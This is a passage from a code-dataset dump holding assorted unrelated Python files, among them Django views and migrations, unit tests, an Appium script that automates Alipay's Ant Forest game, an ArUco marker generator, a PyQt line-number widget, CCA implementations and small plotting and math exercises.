render\nfrom django.core.mail import send_mail\nfrom django.urls import reverse\nfrom django.utils import timezone\n\nfrom .forms import EmailerForm\nimport threading\n\nfrom .models import Email\n\n\ndef index(request):\n if request.method == 'POST':\n form = EmailerForm(request.POST)\n\n if form.is_valid():\n subject = form.cleaned_data['subject']\n message = form.cleaned_data['message']\n seconds = form.cleaned_data['seconds']\n to_whom = form.cleaned_data['to_whom']\n\n sender = os.environ.get('Email_user')\n\n recipients = []\n if to_whom:\n recipients.append(to_whom)\n\n t = threading.Timer(float(seconds), function=send_mail, args=(subject, message, sender, recipients))\n\n Email.objects.create(subject=subject,\n message=message,\n seconds=seconds,\n to_whom=to_whom\n )\n\n t.start()\n return HttpResponseRedirect(reverse('Emailer:detail'))\n else:\n form = EmailerForm()\n\n return render(request, 'index.html', {'form': form})\n\n\ndef detail_page(request):\n last_ten = Email.objects.all().order_by('-id')[:10]\n\n must_be_sent = Email.objects.all().filter(datetime_must_be_send__gt=timezone.now()).order_by('-id')\n\n already_sent = Email.objects.all().filter(datetime_must_be_send__lt=timezone.now()).order_by('-datetime_must_be_send')\n\n context = {'last_ten': last_ten, 'must_be_sent': must_be_sent, 'already_sent': 
already_sent}\n\n return render(request, 'detail.html', context)\n\n\n# git add .\n# git commit -m \"initial commit\"\n# git push heroku master\n# heroku open\n#\n","sub_path":"Emailer/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"179052161","text":"#!/usr/bin/env python3\n# Copyright 2022 The IREE Authors\n#\n# Licensed under the Apache License v2.0 with LLVM Exceptions.\n# See https://llvm.org/LICENSE.txt for license information.\n# SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception\n\nimport unittest\nimport zipfile\n\nfrom io import BytesIO, StringIO\n\nfrom common.benchmark_definition import ModuleComponentSizes\nfrom collect_compilation_statistics import CONST_COMPONENT_NAME, VM_COMPONENT_NAME, get_module_component_info, get_module_path, match_module_cmake_target, parse_compilation_time_from_ninja_log\n\n\nclass CollectCompilationStatistics(unittest.TestCase):\n\n def test_match_module_cmake_target(self):\n target = match_module_cmake_target(\n \"iree/iree-build/benchmark_suites/TFLite/vmfb/test.vmfb\")\n\n self.assertEqual(target, \"benchmark_suites/TFLite/vmfb/test.vmfb\")\n\n def test_match_module_cmake_target_not_match(self):\n target = match_module_cmake_target(\"benchmark_suites/TFLite/vmfb/test.mlir\")\n\n self.assertIsNone(target)\n\n def test_parse_compilation_time_from_ninja_log(self):\n target1 = \"benchmark_suites/TFLite/vmfb/deeplabv3.vmfb\"\n target2 = \"benchmark_suites/TFLite/vmfb/mobilessd.vmfb\"\n ninja_log = StringIO(\"# ninja log v5\\n\"\n f\"0\\t100\\taaa\\tbuild/{target1}\\taaa\\n\"\n f\"130\\t200\\tbbb\\tbuild/{target2}\\tbbb\\n\")\n\n target_map = parse_compilation_time_from_ninja_log(ninja_log)\n\n self.assertEqual(target_map, {target1: 100, target2: 70})\n\n def test_get_module_component_info(self):\n module_file = BytesIO()\n with zipfile.ZipFile(module_file, \"w\") as zip:\n zip.writestr(VM_COMPONENT_NAME, b\"abcd\")\n zip.writestr(CONST_COMPONENT_NAME, b\"123\")\n zip.writestr(\"main_dispatch_0_vulkan_spirv_fb.fb\", b\"bindata1\")\n zip.writestr(\"main_dispatch_1_vulkan_spirv_fb.fb\", b\"bindata2\")\n module_file_data = module_file.getvalue()\n\n component_sizes = get_module_component_info(BytesIO(module_file_data),\n len(module_file_data))\n\n self.assertEqual(\n component_sizes,\n ModuleComponentSizes(file_size=len(module_file_data),\n vm_component_size=4,\n const_component_size=3,\n total_dispatch_component_size=16))\n\n def test_get_module_component_info_unknown_components(self):\n module_file = BytesIO()\n with zipfile.ZipFile(module_file, \"w\") as zip:\n zip.writestr(VM_COMPONENT_NAME, b\"abcd\")\n zip.writestr(CONST_COMPONENT_NAME, b\"123\")\n zip.writestr(\"main_dispatch_0_unknown.fb\", b\"bindata\")\n module_file_data = module_file.getvalue()\n\n self.assertRaises(\n RuntimeError, lambda: get_module_component_info(\n BytesIO(module_file_data), len(module_file_data)))\n\n def test_get_module_path(self):\n flag_file = StringIO(\n f\"--function_inputs=1x2x3xf32\\n--module_file=/abcd.vmfb\")\n\n moduel_path = get_module_path(flag_file)\n\n self.assertEqual(moduel_path, \"/abcd-compile-stats.vmfb\")\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"build_tools/benchmarks/collect_compilation_statistics_test.py","file_name":"collect_compilation_statistics_test.py","file_ext":"py","file_size_in_byte":3093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} 
+{"seq_id":"278330505","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\n\"\"\"\nTests for data formats\n\"\"\"\n\nfrom hub.tests.testutils import TestBase\nfrom hub import formats\nfrom hub.structures.file import FileGroup\n\n\nclass FormatsTests(TestBase):\n TESTS = {\n # first element in considered the main file\n ('mockaroo.com.csv',): formats.CSV,\n ('mockaroo.com.json',): formats.JSON,\n ('mockaroo.com.xlsx',): formats.Excel,\n ('gml/Bahnhoefe.gml', 'gml/Bahnhoefe.gfs', 'gml/Bahnhoefe.xsd',): formats.GML,\n ('json/Bahnhoefe.json',): formats.GeoJSON,\n ('kml/Bahnhoefe.kml',): formats.KML,\n ('shp/Bahnhoefe.shp', 'shp/Bahnhoefe.shx', 'shp/Bahnhoefe.dbf', 'shp/Bahnhoefe.ili'): formats.Shapefile,\n }\n\n def test_identification(self):\n for files, format in self.TESTS.iteritems():\n fg = FileGroup.from_files(*[TestBase.get_test_file_path(f) for f in files])\n self.assertIs(formats.identify(fg[0]), format)\n","sub_path":"src/main/python/hub/tests/tests_formats.py","file_name":"tests_formats.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"328183228","text":"##\n## Programación en Python\n## ===========================================================================\n##\n## Imprima la suma de la segunda columna del archivo `data.csv`.\n##\n## Rta/\n## 190\n##\n## >>> Escriba su codigo a partir de este punto <<<\n##\nfile = open(\"data.csv\",\"r\").readlines()\n\nsuma = 0\n\nfor i in range(len(file)):\n suma += int(file[i].split(\"\\t\")[1])\n\nprint(suma)\n","sub_path":"03-python=1/q01=1/question.py","file_name":"question.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"324845237","text":"from django.conf.urls import url, include\nfrom rest_framework.routers import SimpleRouter\n\nfrom .views import BlogView, TodoView, CurrentUserView\n\nrouter = SimpleRouter(trailing_slash=False)\nrouter.register(\"blog\", BlogView)\nrouter.register(\"todo\", TodoView)\n\nurlpatterns = [\n url(r'^user$', CurrentUserView.as_view(), name='current_user'),\n url(r'^', include(router.urls, namespace='blog')),\n]\n","sub_path":"api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"71918121","text":"# edit by xdd\n# Before running this script, open appium.exe\n# Reference site:https://www.cnblogs.com/deliaries/archive/2020/03/18/12410835.html\n\n\ndef run():\n import time\n from appium import webdriver\n from appium.webdriver.common.touch_action import TouchAction\n start = time.perf_counter() # 计算程序运行时间\n ''' ---------- 打开支付宝 ---------- '''\n desired_caps = {\n \"platformName\": \"Android\",\n \"deviceName\": \"MI 6X\",\n \"appPackage\": \"com.eg.android.AlipayGphone\",\n \"appActivity\": \"com.eg.android.AlipayGphone.AlipayLogin\",\n \"noReset\": \"true\",\n \"fullReset\": \"false\",\n \"automationName\": \"UiAutomator1\"\n }\n server = 'http://localhost:4723/wd/hub'\n print('正在打开支付宝01')\n driver = webdriver.Remote(server, desired_caps) # 启用两次,是因为锁屏打开手机一次有可能打不开\n time.sleep(5)\n print('正在重新打开支付宝02')\n driver = webdriver.Remote(server, desired_caps)\n time.sleep(5)\n print('正在打开蚂蚁森林')\n try:\n driver.find_element_by_xpath(\"//*[@text='蚂蚁森林']\").click() # 点击蚂蚁森林\n except:\n TouchAction(driver).press(x=535, y=750).release().perform() # 蚂蚁森林的图标位置,我的在首页,不在的话,要先打开更多\n 
#TouchAction(driver).press(x=544, y=706).release().perform() # 蚂蚁森林的图标位置,我的在首页,不在的话,要先打开更多\n # 点击蚂蚁森林(以id打开,这种较好,但是appium有些故障,刷新不出来\n # driver.find_element_by_id('com.alipay.android.phone.wallet.homemarket:id/app_group_item_icon').click()\n time.sleep(5)\n ''' ---------- 收取自己的能量 ---------- '''\n try:\n print('正在收取自己能量')\n items = driver.find_elements_by_class_name(\"android.widget.Button\")\n # print(items)\n name = driver.find_element_by_id('com.alipay.mobile.nebula:id/h5_tv_title').text\n if len(items) > 14:\n for i in items:\n if '能量' in i.text:\n i.click()\n print('我点')\n time.sleep(0.5)\n except:\n pass\n\n ''' 在蚂蚁森林界面,向下滑,找到更多好友,点击 '''\n print('正在打开更多好友')\n time.sleep(2)\n n = 0\n while n <= 5:\n start_x = 500\n start_y = 1500\n distance = 1000\n driver.swipe(start_x, start_y, start_x, start_y - distance)\n n = n + 1\n time.sleep(0.2)\n driver.find_element_by_xpath(\"//*[@text='查看更多好友']\").click() # 点击查看更多好友\n time.sleep(1)\n driver.find_element_by_xpath(\"//*[@text='总排行榜']\").click() # 点击总排行榜\n # ----------- 进入偷能量界面 ---------- '''\n while True:\n TouchAction(driver).press(x=345, y=481).release().perform() # 第一个蚂蚁好友框框的坐标,随着滑动,每一个好友都会出现在这个坐标点\n # time.sleep(0.5) # 等一会让系统进入这个界面\n\n name = driver.find_element_by_id('com.alipay.mobile.nebula:id/h5_tv_title').text\n print('正在查看{0}'.format(name))\n if name in ['陈欣的蚂蚁森林','崔鼎正的蚂蚁森林']: # 填写最后一个好友昵称,程序不会遍历到最后一个,因为到最后的时候,界面不能滑动;可先填最后一个,看能遍历到哪一个好友,再修改即可.\n break\n\n items = driver.find_elements_by_class_name(\"android.widget.Button\")\n # print(len(items),'\\n',items)\n if len(items) > 6: # 执行此项是界面界面有东西(能量或者不可点能量)在自己的名字栏,因len(items)=0<5,会直接向上划过\n try:\n for i in items:\n if '能量' in i.text:\n print('我点点')\n i.click()\n time.sleep(0.5)\n TouchAction(driver).press(x=69, y=138).release().perform() # 左上角返回\n time.sleep(0.2)\n except:\n pass\n elif len(items) > 1: # 执行此项的是能量界面为空的好友;\n TouchAction(driver).press(x=69, y=138).release().perform() # 左上角返回\n time.sleep(0.2)\n else: # 加执行此项的是 点击无反应的界面,和自己的名字栏,(len=0)不能左上角返回\n pass\n start_x = 500\n start_y = 1910\n distance = 187 # 一个框的高度\n driver.swipe(start_x, start_y, start_x, start_y - distance) # 向上滑动一个框的高度 # driver.swipe(分别表示滑动的起始和终点位置的 x/y 坐标)\n time.sleep(0.5) # 系统反应也需要时间,此处sleep()不可省略\n\n TouchAction(driver).press(x=995, y=129).release().perform() # 右上角退出,蚂蚁森林\n time.sleep(2)\n print('正在打开蚂蚁森林')\n TouchAction(driver).press(x=544, y=706).release().perform()\n\n end = time.perf_counter()\n tim = end - start\n txtshow = '偷能量完成,运行这段代码用时:{:.6f}秒'.format(tim)\n print(txtshow)\n\n","sub_path":"蚂蚁森林/EnergyFast.py","file_name":"EnergyFast.py","file_ext":"py","file_size_in_byte":5336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"219155298","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport filer.fields.image\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('filer', '0001_initial'),\n ('excursions', '0001_initial'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='excursion',\n name='image',\n field=filer.fields.image.FilerImageField(related_name=b'excursion_images', blank=True, to='filer.Image', null=True),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='excursion',\n name='img_preview',\n field=filer.fields.image.FilerImageField(related_name=b'small_preview', blank=True, to='filer.Image', null=True),\n preserve_default=True,\n ),\n 
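# both image fields link into django-filer's Image model\n    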
]\n","sub_path":"apps/excursions/migrations/0002_auto_20150109_0319.py","file_name":"0002_auto_20150109_0319.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"126438225","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\n**************************************************************************\r\n* E-Yantra Robotics Competition\r\n* ================================\r\n* This software is intended to check version compatiability of open source software\r\n* Theme: ANT BOT\r\n* MODULE: Task1.1\r\n* Filename: Task1.1.py\r\n* Version: 1.0.0 \r\n* Date: October 31, 2018\r\n* \r\n* Author: e-Yantra Project, Department of Computer Science\r\n* and Engineering, Indian Institute of Technology Bombay.\r\n* \r\n* Software released under Creative Commons CC BY-NC-SA\r\n*\r\n* For legal information refer to:\r\n* http://creativecommons.org/licenses/by-nc-sa/4.0/legalcode \r\n* \r\n*\r\n* This software is made available on an “AS IS WHERE IS BASIS”. \r\n* Licensee/end user indemnifies and will keep e-Yantra indemnified from\r\n* any and all claim(s) that emanate from the use of the Software or \r\n* breach of the terms of this agreement.\r\n* \r\n* e-Yantra - An MHRD project under National Mission on Education using \r\n* ICT(NMEICT)\r\n*\r\n**************************************************************************\r\n\"\"\"\r\n\r\n\"\"\"\r\nArUco ID Dictionaries: 4X4 = 4-bit pixel, 4X4_50 = 50 combinations of a 4-bit pixel image\r\nList of Dictionaries in OpenCV's ArUco library:\r\nDICT_4X4_50\t \r\nDICT_4X4_100\t \r\nDICT_4X4_250\t \r\nDICT_4X4_1000\t \r\nDICT_5X5_50\t \r\nDICT_5X5_100\t \r\nDICT_5X5_250\t \r\nDICT_5X5_1000\t \r\nDICT_6X6_50\t \r\nDICT_6X6_100\t \r\nDICT_6X6_250\t \r\nDICT_6X6_1000\t \r\nDICT_7X7_50\t \r\nDICT_7X7_100\t \r\nDICT_7X7_250\t \r\nDICT_7X7_1000\t \r\nDICT_ARUCO_ORIGINAL\r\n\r\nReference: http://hackage.haskell.org/package/opencv-extra-0.2.0.1/docs/OpenCV-Extra-ArUco.html\r\n\"\"\"\r\n\r\nimport numpy\r\nimport cv2\r\nimport cv2.aruco as aruco\r\ninp_dict = [aruco.DICT_4X4_50, aruco.DICT_4X4_50, aruco.DICT_5X5_250, aruco.DICT_5X5_250] #Enter the required nXn and C from the list above in the required order\r\nid = [6, 29, 30, 199] #Enter the required IDs in the corresponding order\r\ni = 0\r\n\r\ndef aruco_gen(id_aruco, num_pixels):\r\n aruco_dict = aruco.Dictionary_get(inp_dict[i]) #replace n with no. of bits per pixel and C with the no. of combinations\r\n #select n and C from the list mentioned above\r\n img = aruco.drawMarker(aruco_dict, id_aruco, num_pixels)\r\n '''\r\n # cv2.imshow('frame',img)\r\n # cv2.waitKey(0)\r\n '''\r\n img = cv2.cvtColor(img, cv2.COLOR_GRAY2BGR) # converts greyscale to bgr\r\n img = cv2.copyMakeBorder(img, 25, 25, 25, 25, borderType = cv2.BORDER_CONSTANT, value = [255, 255, 255]) # creates a white border\r\n # cv2.rectangle(border, (120,0),(380,22),(0,255,0))\r\n font = cv2.FONT_HERSHEY_PLAIN\r\n text = cv2.getTextSize('ArUco ID = 26', font, 1, 1)\r\n width = (num_pixels + 50 - text[0][0]) // 2\r\n height = (text[0][1] + 8)\r\n img = cv2.putText(img, 'ArUco ID = ' + str(id_aruco), (width, height), font, 1, (0, 0, 255), 1, cv2.LINE_AA)\r\n # print(text)\r\n cv2.imwrite('ArUco'+str(id_aruco)+'.jpg', img)\r\n cv2.imshow('ArUco'+ str(id_aruco), img)\r\n cv2.waitKey(0) # Press esc to view the next generated AruCo Marker\r\n cv2.destroyAllWindows()\r\n '''\r\n code here for saving the Aruco image as a \"jpg\" by following the steps below:\r\n 1. 
save the image as a colour RGB image in OpenCV color image format\r\n 2. embed a boundary of 25 pixels on all four sides and three channels of the image\r\n 3. save the image as \"ArUcoID.jpg\" where ID is the digits of id_aruco i.e. if the ID is 26 the name should be: ArUco26.jpg\r\n 4. APIs which are permitted to be used are:\r\n a. cvtColor\r\n b. imwrite\r\n and other OpenCV APIs.\r\n 5. You are permitted to modify n, C and variables id_aruco and num_pixels\r\n '''\r\nif __name__ == \"__main__\":\r\n for j in range(len(id)):\r\n aruco_gen(id[j], 400) # Calls the funtion for every id\r\n i+=1 # Keeps a track of the corresponding format of the IDs\r\n","sub_path":"Task 1/AB_426#0_426_Task1.1_Solution/426_Task1.1/Code/426_Task1.1.py","file_name":"426_Task1.1.py","file_ext":"py","file_size_in_byte":3934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"616232939","text":"# Copyright (C) 2009 John Schember, 2011-2013 nycz\n\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to\n# deal in the Software without restriction, including without limitation the\n# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or\n# sell copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n# Note: taken from http://john.nachtimwald.com/2009/08/15/qtextedit-with-line-numbers/\n# Or more precisely: http://www.japh.de/blog/qtextedit-with-line-numbers/\n\n\nfrom PyQt4 import QtGui\n\n\nclass LineTextWidget(QtGui.QPlainTextEdit):\n\n def append(self,string):\n self.appendPlainText(string)\n\n class NumberBar(QtGui.QWidget):\n\n def __init__(self, parent):\n super().__init__(parent)\n self.edit = None\n # This is used to update the width of the control.\n # It is the highest line that is currently visibile.\n self.highest_line = 0\n self.showbar = False\n\n def set_text_edit(self, edit):\n self.edit = edit\n\n def update(self, *args):\n if not self.showbar:\n width = 0\n else:\n width = QtGui.QFontMetrics(self.edit.document().defaultFont()).\\\n width(str(self.highest_line)) + 10\n if self.width() != width:\n self.setFixedWidth(width)\n self.edit.setViewportMargins(width,0,0,0)\n super().update(*args)\n\n def paintEvent(self, event):\n contents_y = 0\n page_bottom = self.edit.viewport().height()\n font_metrics = QtGui.QFontMetrics(self.edit.document().\n defaultFont())\n current_block = self.edit.document().findBlock(self.edit.\n textCursor().\n position())\n\n painter = QtGui.QPainter(self)\n\n # Iterate over all text blocks in the document.\n block = self.edit.firstVisibleBlock()\n viewport_offset = self.edit.contentOffset()\n line_count = block.blockNumber()\n painter.setFont(self.edit.document().defaultFont())\n painter.setPen(QtGui.QColor('darkGray'))\n while block.isValid():\n line_count += 1\n\n # The top left position of the block in the document\n position = self.edit.blockBoundingGeometry(block).topLeft()\\\n + viewport_offset\n # Check if the position of the block is out side of the visible\n # area.\n if position.y() > page_bottom:\n break\n\n # We want the line number for the selected line to be bold.\n bold = False\n if block == current_block:\n bold = True\n font = painter.font()\n font.setBold(True)\n painter.setFont(font)\n\n # Draw the line number right justified at the y position of the\n # line. 3 is a magic padding number. 
drawText(x, y, text).\n painter.drawText(self.width() - font_metrics.\n width(str(line_count)) - 3,\n round(position.y() + font_metrics.\n ascent()*1.05), str(line_count))\n\n # Remove the bold style if it was set previously.\n if bold:\n font = painter.font()\n font.setBold(False)\n painter.setFont(font)\n\n block = block.next()\n\n self.highest_line = line_count\n painter.end()\n\n super().paintEvent(event)\n\n\n def __init__(self, parent):\n super().__init__(parent)\n\n self.number_bar = self.NumberBar(self)\n self.number_bar.set_text_edit(self)\n\n self.viewport().installEventFilter(self)\n\n # ==== Setting callbacks ========================================\n def set_number_bar_visibility(self, visible):\n self.number_bar.showbar = visible\n self.number_bar.update()\n # ===============================================================\n\n def resizeEvent(self,e):\n self.number_bar.setFixedHeight(self.height())\n super().resizeEvent(e)\n\n def setDefaultFont(self,font):\n self.document().setDefaultFont(font)\n\n def eventFilter(self, object, event):\n # Update the line numbers for all events on the text edit\n # and the viewport.\n # This is easier than connecting all necessary singals.\n if object is self.viewport():\n self.number_bar.update()\n return False\n # Not sure how this would work with super so i'm letting it be //nycz\n return QtGui.QPlainTextEdit.eventFilter(object, event)\n","sub_path":"linewidget.py","file_name":"linewidget.py","file_ext":"py","file_size_in_byte":5726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"653527186","text":"from time import sleep\n#from test_function_flags import checkShare\n\nFLG1 = True\nFLG2 = False\n\ndef checkShare():\n global FLG1, FLG2\n FLG1 = 'from func FLG-1'\n FLG2 = 'from func FLG-2'\n\nwhile True:\n print('FLG1 = ' + str(FLG1))\n print('FLG2 = ' + str(FLG2))\n sleep(.5)\n FLG1 = [1, 2]\n FLG2 = [3, 4]\n print('FLG1 = ' + str(FLG1))\n print('FLG2 = ' + str(FLG2))\n sleep(.5)\n FLG1 = True\n FLG2 = False\n sleep(.5)\n print('FLG1 = ' + str(FLG1))\n print('FLG2 = ' + str(FLG2))\n checkShare()\n sleep(.5)\n \n \n \n","sub_path":"resources/test_flags_between_files.py","file_name":"test_flags_between_files.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"409661759","text":"from sklearn.cross_decomposition import CCA\nimport numpy as np\nimport numpy.linalg as linalg\nimport scipy.sparse as sparse\nimport helpers\nimport matplotlib.pyplot as plt\n\ndef perform_cca_sklearn(x1, x2, n = 1):\n\tcca = CCA(n_components=n)\n\tcca.fit(x1, x2)\n\ty1, y2 = cca.transform(x1, x2)\n\treturn [y1, y2]\n\ndef perform_cca_svd(x, y, k):\n\t# based on http://www.nr.com/whp/notes/CanonCorrBySVD.pdf\n\t# will bet my life this doesn't work at all. 
don't use it\n\tu1, s1, vt1 = np.linalg.svd(x)\n\tu2, s2, vt2 = np.linalg.svd(y)\n\ts1 = np.diag(s1)\n\ts2 = np.diag(s2)\n\n\tU, S, Vt = np.linalg.svd(u1.T.dot(u2))\n\tS = np.diag(S)\n\n\tU = U[:,:k]\n\tV = Vt.T[:,:k]\n\n\ta = vt1.T.dot(np.linalg.inv(s1)).dot(U)\n\tb = vt2.T.dot(np.linalg.inv(s2)).dot(V)\n\n\txp = x.dot(a)\n\typ = y.dot(b)\n\n\treturn a, b, xp, yp\n\ndef perform_cca(x, y, k):\n\t# based on lecture: http://www.cs.cornell.edu/Courses/cs4786/2015sp/lectures/lec05.pdf\n\n\t# Concatenate the matrices and get the covariance matrix\n\tz = np.hstack((x,y))\n\tzcov = np.cov(z.T)\n\n\t# Used to partition the cov matrix (integer division so the slices get int indices)\n\tcov_rows = zcov.shape[0]//2\n\tcov_cols = zcov.shape[1]//2\n\n\t# Partition it\n\tS11 = zcov[:cov_rows,:cov_cols]\n\tS12 = zcov[:cov_rows,cov_cols:]\n\tS21 = zcov[cov_rows:,:cov_cols]\n\tS22 = zcov[cov_rows:,cov_cols:]\n\n\t# Straight from the lecture slides\n\tm1 = linalg.inv(S11).dot(S12).dot(linalg.inv(S22)).dot(S21)\n\tm2 = linalg.inv(S22).dot(S21).dot(linalg.inv(S11)).dot(S12)\n\n\t# Get the top k eigenvectors\n\t#m1_evals, m1_evecs = sparse.linalg.eigs(m1, k=k, which='LM')\n\t#m2_evals, m2_evecs = sparse.linalg.eigs(m2, k=k, which='LM')\n\tm1_evals, m1_evecs = np.linalg.eig(m1)\n\tm2_evals, m2_evecs = np.linalg.eig(m2)\n\n\tm1_sorted_idx = m1_evals.argsort() \n\tm1_sorted_idx = m1_sorted_idx[::-1] # reverse it for dec order\n\tm1_evals = m1_evals[m1_sorted_idx]\n\tm1_evecs = m1_evecs[:,m1_sorted_idx]\n\n\tm2_sorted_idx = m2_evals.argsort() \n\tm2_sorted_idx = m2_sorted_idx[::-1] # reverse it for dec order\n\tm2_evals = m2_evals[m2_sorted_idx]\n\tm2_evecs = m2_evecs[:,m2_sorted_idx]\n\n\t# Turn them into projection matrices\n\tW1 = m1_evecs.T[:k]\n\tW2 = m2_evecs.T[:k]\n\n\t# Project the points\n\tx_centered = (x - np.mean(x))/np.std(x)\n\ty_centered = (y - np.mean(y))/np.std(y)\n\txp = W1.dot(x_centered.T).T\n\typ = W2.dot(y_centered.T).T\n\n\treturn xp, yp\n\n'''\nx = np.random.random((10,10))\ny = x*4\n\nxp, yp = perform_cca(y,x,2)\nplt.scatter(xp[:,0], xp[:,1], color='red', label='first', s=np.pi*10**2)\nplt.scatter(yp[:,0], yp[:,1], color='green', label='second', s=np.pi*5**2)\nplt.show()\n'''\n\n#a,b,u,v = perform_cca(x,y,3)","sub_path":"cca.py","file_name":"cca.py","file_ext":"py","file_size_in_byte":2511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"448188332","text":"#Question-https://www.geeksforgeeks.org/check-given-graph-tree/\n\n#Answer-\nclass Node: \n    def __init__(self, data): \n        self.data = data \n        self.left = self.right = None\n  \ndef dispRtL(root): \n    if (root == None): \n        return\n    stack = [] \n    stack.append(root) \n    parent = {} \n    parent[root] = None\n    while len(stack) != 0: \n        current = stack[-1] \n        stack.pop(-1) \n        if (not (current.left) and\n            not (current.right)): \n            displayTtBPath(current, parent) \n        if (current.right): \n            parent[current.right] = current \n            stack.append(current.right) \n        if (current.left): \n            parent[current.left] = current \n            stack.append(current.left) \n\ndef displayTtBPath(curr, parent): \n    stk = [] \n    while (curr): \n        stk.append(curr) \n        curr = parent[curr] \n    while len(stk) != 0: \n        curr = stk[-1] \n        stk.pop(-1) \n        print(curr.data, end = \" \") \n    print() \n\nroot = Node(10) \nroot.left = Node(8) \nroot.right = Node(2) \nroot.left.left = Node(3) \nroot.left.right = Node(5) \nroot.right.left = Node(2) \ndispRtL(root) 
","sub_path":"assignments/Week07/Day02_(03-03-2020)/Ques4.py","file_name":"Ques4.py","file_ext":"py","file_size_in_byte":1168,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"383065027","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nEsercizio 2\n-------------------\n\nPer i dati (x_i, y_i) riportati nei seguenti array:\n x = [0.0004, 0.2507, 0.5008, 2.0007, 8.0013];\n y = [0.0007, 0.0162, 0.0288, 0.0309, 0.0310];\n-- costruire la retta di regressione;\n-- costruire la parabola approssimante i dati nel senso dei minimi quadrati;\n-- costruire la cubica approssimante i dati nel senso dei minimi quadrati;\n\nQuale tra le tre approssimazioni risulta migliore? \nConfrontare i grafici e la norma euclidea al quadrato del vettore dei residui. \n\nNOTE: Si nota che, all'aumentare del grado del polinomio n, la norma al \n quadrato del residuo diminuisce.\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport minimi_quadrati as mq\n\nx = np.array([0.0004, 0.2507, 0.5008, 2.0007, 8.0013])\ny = np.array([0.0007, 0.0162, 0.0288, 0.0309, 0.0310])\nx_val = np.linspace(np.min(x), np.max(x), 100)\ny_val = []\n\nfor n in range(1, 4):\n a = mq.QR(x, y, n)\n '''\n Calcolo il residuo: ||y - Ba||^2 dove B è la matrice di Vandermonde, y il vettore colonna \n contenente le ordinate dei punti dati e a è il vettore colonna incognito. \n Dalla teoria (pg. 17) si ha che:\n ||y - Ba||^2 = Σ(y_i - p_n(x_i))^2\n '''\n residuo = np.linalg.norm(y - np.polyval(a, x))**2\n print(\"n = \", n, \"--> Norma al quadrato del residuo =\", residuo)\n '''\n Per graficare la curva valuto il polinomio nei 100 punti equidistanti compresi tra min(x) e max(x).\n In particolare polyval ritorna, detta N la lunghezza di a:\n p[i] = a[0]*x_val[i]**(N-1) + a[1]*x_val[i]**(N-2) + ... 
+ a[N-2]*x_val[i] + a[N-1]\n '''\n p = np.polyval(a, x_val)\n plt.plot(x_val, p)\n\nplt.plot(x, y, 'ro')\nplt.legend(['Retta di regressione', 'Parabola', 'Cubica', 'Dati'])\nplt.show()\n \n","sub_path":"06-minimi-quadrati/es02.py","file_name":"es02.py","file_ext":"py","file_size_in_byte":1815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"533406871","text":"# coding: utf-8\n__author__ = 'Administrator'\nimport Tkinter\nimport math\n''' 画出三角函数曲线'''\n\n\n\ncanvas_width=1000\ncanvas_height=400\n#scale=float(canvas_width/6.25)\nscale=float(80)\ntk = Tkinter.Tk()\ntk.title=\"COS\"\ncanvas = Tkinter.Canvas(tk, width=canvas_width, height=canvas_height)\ncanvas.create_line(0, canvas_height/2, canvas_width, canvas_height/2)\ncanvas.create_line(canvas_width/2, 0, canvas_width/2, canvas_height)\ndef cos_pos(x):\n y=math.cos(x)*scale\n return [int(x*scale),int(y+canvas_height/2)]\n\ndef sin_pos(x):\n y=math.sin(x)*scale\n return [int(x*scale),int(y+canvas_height/2)]\n\n\nfor x in range(0,canvas_width+1):\n x1=x/scale\n canvas.create_line(sin_pos(x1)[0],sin_pos(x1)[1], sin_pos(x1+0.1)[0],sin_pos(x1+0.1)[1] 